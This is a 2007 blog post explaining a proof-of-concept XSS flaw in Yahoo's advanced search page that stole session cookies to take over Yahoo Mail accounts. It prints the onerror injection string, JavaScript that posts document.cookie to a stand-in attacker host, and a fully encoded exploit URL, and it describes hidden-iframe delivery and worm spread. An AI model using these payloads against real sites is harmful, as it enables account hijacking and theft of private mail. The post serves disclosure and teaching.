Monday, June 25, 2007

Technical Explanation of Yahoo XSS flaw

Several days ago, I released a proof of concept to demonstrate how to exploit a simple "Cross-site scripting" (XSS) hole at Yahoo's web site. This PoC allowed anyone to steal a poor bastard's online identity and email. I can see that from the comments on my exploit post and comments on the slashdot post that the technical details are confusing to many.

XSS is both simple and complex. The idea of javascript injection is not very complicated to programmers, especially if they're already familiar with SQL injections. But the damage that a particular XSS hole opens up a site to and the actual process of exploiting that hole are not always clear-cut: the technical details vary, the sites may have different levels of protection, and tricks may be needed to overcome browser incompatibilities and other constraints.

The Trap

I'll start out with a general description of the trap set up by the exploit and why it's so easy to fall into it. By the way, the trap in my proof of concept was tested to work on all major Firefox and IE browser versions with default settings.

With the PoC as I presented it, the victim would have to somehow navigate to a somewhat suspicious-looking link, a criticism that many claim makes the exploit less realistic. But the link can be masked through a myriad of ways. You could for instance create a webpage http://myhotpix.com/ with a hidden iframe that automatically and silently visits the XSS url, and voila: the user has just been hit by the XSS exploit without even knowing it or seeing any suspicious URLs. As one commenter suggested, you could insert and disguise this link on the MySpace profile of "some hot girl" (tm).

The exploit could also be made into a worm for maximal spread. When a user falls victim to it by visiting the malicious link, their account would be used to send copies of the malicious link to all their contacts at Yahoo Mail or Yahoo IM.

JavaScript Injection

Let's get into the technical details of how the exploit functions. The technique this XSS hole used is called "javascript injection." What you need is a vulnerable page on the target web site that takes input data from the browser, i.e. the victim, but that doesn't properly clean up the inputs of malicious characters. When you find a page that accepts query string parameters via the URL or a form results page that accepts form parameters, you test the page for vulnerabilities by sending unexpected input data and check if the back-end code neglects to clean up the input data before sending it inside the page's HTML source back to the user's browser.

In the case of my PoC, the form field was the "all of these words" field in Yahoo's Advanced Web Search form. By appending ?p=anything to you can see that whatever you put after http://search.yahoo.com/web/advanced?p= will show up in the results page's textbox. Normally, yahoo's backend is supposed to filter and escape user-generated input like this. But in this case, their input filter was not foolproof, and this is what allowed us to inject javascript into the page. The string which circumvented their filter was
<img src=14_invalid_crap onerror=OUR_MALICIOUS_JAVASCRIPT>
What this did was insert an img tag into the page with an invalid src url which triggered the onerror javascript event which executed our malicious javascript.

Cross-site cookie theft


The malicious JS has only one purpose: to send the user's Yahoo cookies to the attacker. With JS you can grab all the cookies from the web site that the user is visiting by calling document.cookie. And in my PoC, the transport mechanism to send all the user's cookies to an outside site is simply via an img or iframe tag inserted into the document. This tag references a URL with a query string that includes the grabbed cookies. The URL points to a CGI script on a 3rd-party web site; hence, the "cross-site" in "cross-site scripting." This CGI script is then free to do whatever it wants with these cookies, including impersonating the victim. For example, the malicious JS could be something like:
document.write('<img src=http://evilsite.com/evil.cgi?cookies='+escape(document.cookies)+'/>')
This is the most common structure of XSS exploits, and this PoC is not much different. For a well-working portable XSS exploit, however, a few tweaks may be necessary.

In our case the Yahoo cookies were very long and exceeded Internet Explorer's maximum URL length for a GET request (interestingly, Firefox did not suffer from this limitation--its maximum length must be greater). So I used a different approach and hijacked the actual search form so that a POST request could be used instead of GET, since a POST request has no maximum data length. The JS to do this was very simple:
f = document.forms[0]
f.method = 'POST'
f.action = 'http://evilsite.com/evil.cgi'
f.x.value = document.cookie
f.submit()

Identity Theft


In our PoC, the CGI script on the 3rd party site happens to be written in Perl but could have been written in any server-side language. Once it reads in the value of the cookies passed on by the malicious JS, it is free to act as a web browser with these cookies set and navigate to Yahoo Mail pretending to be the victim.

What the PoC actually did for demonstration purposes was grab your latest email and display it back to you, to prove that the identity was stolen. What the CGI script could have done is use the cookies to download all your email or addressbok to harvest any private information contained within your account. This is what malicious hackers do all the time with XSS holes and it goes unnoticed.

By the way, a few portability tweaks were necessary to function for both classic Yahoo Mail and Yahoo Mail Beta.

Single Sign-On Architecture

One thing you may have noticed is that the XSS hole was found on the Yahoo search page, but the PoC attacks the victim's Yahoo Mail account. If these sites are separate, how is this possible? The answer has to do with Yahoo's single sign-on (SSO) architecture: most large web sites want all their services accessible through one login, which is normally very convenient for users as they don't have to keep logging in every time they switch from Yahoo Mail to Yahoo Photos to Yahoo IM.

However, the way that Yahoo has it set up makes things a little insecure. Other Yahoo services may differ but at least Mail and Search are designed in the following way: all the cookies necessary to access both these services are the same. In other words, if you grab the cookies using an XSS hole in one service, you can now access the other. All Yahoo's cookies have a domain of .yahoo.com and a path of '/'. Specifically, this means that if there is some vulnerability that allows you to grab cookies on any site that matches *.yahoo.com/*, you'll be able to access all yahoo services as that user.

XSS URL generation

The Ruby script from the proof of concept is only a utility program to generate the XSS URL one time. You would run this script (which could have been written in any language) on any of your machines and never run it again--no victim would execute that code. The reason the XSS URL needs to be generated is because the URL needs to be in format that circumvents whatever input filters Yahoo may have, i.e. a format that hides the fact that it contains malicious JavaScript code.

The input to the Ruby script is the location of the 3rd party web site where the CGI script resides; the output is the XSS URL that you would send to potential victims as a trap. For our PoC, since we did not actually host the malicious CGI script anywhere, there was no real XSS URL to show. But as an example, if the URL were hosted on http://scriptkiddies.org/youvegotmail.cgi, the Ruby script would generate the following XSS URL:


http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(102,61,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,59,102,46,109,101,116,104,111,100,61,39,80,79,83,84,39,59,102,46,97,99,116,105,111,110,61,39,104,116,116,112,58,47,47,115,99,114,105,112,116,107,105,100,100,105,101,115,46,111,114,103,47,121,111,117,118,101,103,111,116,109,97,105,108,46,99,103,105,39,59,102,46,120,46,118,97,108,117,101,61,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,102,46,115,117,98,109,105,116,40,41))%3E&y=Search&fr=yfp-t-501




The decimal numbers are simply the ASCII values of each character of the javascript code. The String.fromCharCode() function converts the masked characters back to javascript code that can be interpreted by the victim's browser. The eval() function simply makes sure to execute the converted JS code, since there already would have been one pass which would execute the javascript String.fromCharChode() function. This little roundabout choreography adds up to a dance around Yahoo's input filters. I suspect that in the future fromCharCode will be added to many websites' input filters as it is a very common source of XSS holes.

- Rarely Greys <rarely.greys at (Google's mail)>